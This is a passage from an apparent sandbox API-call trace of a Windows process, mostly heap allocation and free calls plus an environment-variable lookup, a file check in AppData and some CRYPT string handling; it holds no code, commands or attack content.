(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0223.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0223.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0223.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0223.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0223.420] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0223.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0223.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0223.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0223.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0223.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0223.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0223.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0223.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0223.421] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0223.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0223.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0223.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0223.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0223.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0223.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0223.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0223.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0223.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0223.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0223.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0223.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0223.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0223.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0223.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0223.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0223.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0223.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0223.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0223.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0223.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0223.423] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0223.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0223.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0223.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0223.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0223.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0223.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0223.424] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0223.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0223.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0223.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0223.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0223.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0223.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0223.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0223.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0223.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0223.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0223.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0223.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0223.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0223.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0223.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0223.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0223.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0223.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0223.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0223.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0223.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0223.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0223.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0223.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0223.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0223.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0223.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0223.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0223.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0223.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0223.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0223.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0223.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0223.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0223.428] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ATHv.mp4", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9a0ef00, ftCreationTime.dwHighDateTime=0x1d5e235, ftLastAccessTime.dwLowDateTime=0x2673a800, ftLastAccessTime.dwHighDateTime=0x1d5e11e, ftLastWriteTime.dwLowDateTime=0x2673a800, ftLastWriteTime.dwHighDateTime=0x1d5e11e, nFileSizeHigh=0x0, nFileSizeLow=0x3f24, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="ATHv.mp4", cAlternateFileName="")) returned 0xa87110 [0223.428] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0223.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0223.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0223.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0223.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0223.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0223.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.429] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0223.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0223.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0223.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0223.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.429] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0223.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0223.430] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0223.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0223.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0223.430] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0223.430] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0223.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0223.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0223.430] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0223.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0223.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0223.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0223.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0223.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0223.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0223.430] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0223.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0223.431] RtlAllocateHeap (HeapHandle=0x970000, 